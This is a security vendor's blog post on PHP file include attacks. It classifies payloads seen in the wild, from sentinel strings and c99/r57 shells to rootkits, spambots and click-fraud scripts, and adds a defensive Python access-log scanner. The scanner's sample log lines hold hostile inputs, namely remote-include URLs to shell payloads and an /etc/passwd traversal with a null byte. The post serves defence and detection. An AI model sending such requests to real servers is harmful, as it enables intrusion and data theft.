TippingPoint Digital Vaccine Laboratories

PHP File Include Attacks (Part 2 of 4)

In the first part of this series, we talked about what a PHP file include attack is and what it looks like on the wire. This week we'll dive into how attackers are using these vulnerabilities, as well as take a look at some of the payloads they are using.

To start, let's look at the different kinds of payloads people are using in the wild:

Types of payloads:
  1. Sentinels: These payloads contain a simple unique string (or a small PHP function that generates a unique string). Attackers use them during a large scan to identify whether, and which, targets are vulnerable. A couple of examples are:
    • <? echo "bekmekquient" ?>
    • 2464053717f0da0c0b00671ab9a8783e
  2. Remote administration tools: These are your c99/r57 shells. They provide the attacker with a tool for administering the target server as well as launching attacks on other servers. We have seen many instances of attackers using these tools to facilitate spam and phishing campaigns.
    • c99shell/r57shell - fully featured remote admin tools
    • webadmin.php - a simple Web-based file manager
  3. Rootkits: While conceptually similar to remote admin tools, what we are calling PHP rootkits are more focused on taking full and lasting control of the underlying system. Typically these scripts come with a local kernel exploit or an automated install of trojaned software. So far, we have not seen any substantial link between these payloads and phishing or spam campaigns, as we do with remote admin tools.
    • Automated install of a trojaned MySQL server
    • Local kernel exploits to gain root access to the system
  4. Spambots: The trusty spambot. PHP spambots range in sophistication from simple spam relays to automated scripts which harvest E-mail addresses from local databases and files. All of them serve to annoy you. 
    • PHP-Mailer is often used
  5. Autosurf scripts: These are scripts designed to click through ads and websites in order to artificially increase advertising revenue. Otherwise known as click fraud scripts, these tend not to cause any harm to the system itself.
 
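Every payload type above reaches a server the same way: a request that points an include parameter at a URL the attacker controls, so the earliest place a defender sees these attacks is the web server's access log. The following Python check is an added example, not TippingPoint's code; it scans constructed Apache combined-format log lines (documentation addresses, not real attackers or payload hosts), flags parameters that carry a remote URL, records the payload URL for follow-up classification, and also catches traversal/null-byte variants, which goes slightly beyond the remote case this post describes.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines for the demo; the hosts are
# documentation addresses, not real attackers or payload servers.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2008:11:46:01 -0600] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Feb/2008:11:46:03 -0600] "GET /index.php?page=http://203.0.113.7/id.txt? HTTP/1.1" 200 88 "-" "libwww-perl/5.805"
10.0.0.9 - - [12/Feb/2008:11:46:04 -0600] "GET /show.php?inc=http%3A%2F%2F198.51.100.2%2Fc99.txt%3F%26cmd%3Dls HTTP/1.0" 200 4096 "-" "-"
10.0.0.3 - - [12/Feb/2008:11:46:05 -0600] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 30 "-" "Mozilla/4.0"
"""

# Only the fields the check needs from the combined log format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')
# Schemes PHP's include() will fetch when allow_url_fopen/allow_url_include is on.
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def classify_value(value):
    """Return 'remote_include', 'local_include' or None for one query value."""
    if REMOTE_RE.match(value):
        # Attackers often end the URL with '?' so any suffix the script
        # appends (e.g. '.php') becomes a harmless query string.
        return 'remote_include'
    if '../' in value or '..\\' in value or '\x00' in value:
        # Traversal, or a null byte used to cut off an appended suffix.
        return 'local_include'
    return None

def find_include_attempts(log_text):
    """Scan access-log text; return one dict per suspicious query parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = urlsplit(m['target'])
        # parse_qsl percent-decodes each value, so %3A%2F%2F comes back as ://
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({'ip': m['ip'], 'time': m['ts'], 'script': target.path,
                                 'param': name, 'kind': kind, 'payload': value})
    return findings

if __name__ == '__main__':
    for f in find_include_attempts(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']:15} {f['script']}?{f['param']}= {f['payload']!r}")
```

The recorded payload URL is what an analyst retrieves (from a sandbox, not the production server) to sort the hit into one of the categories above, and the source IP is what gets correlated across the rest of the scan.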
For several months, TippingPoint has been harvesting the payloads used by attackers during real, live attacks. From this effort we categorized thousands of payloads; the graph below shows the distinct payloads we have seen to date. As you can see, by far the most popular choice is remote admin tools. This is likely because they offer the most flexibility for taking control of the target system.



In the process of analyzing these backdoors we also noticed that these attacks often precede a phishing or spam campaign. Gone are the days when attackers defaced a site to gain notoriety. These days, the focus is squarely on making money.

That’s it for this week. Come back next week where we discuss some of the strategies for preventing these attacks.


Published On: 2008-02-12 11:46:01
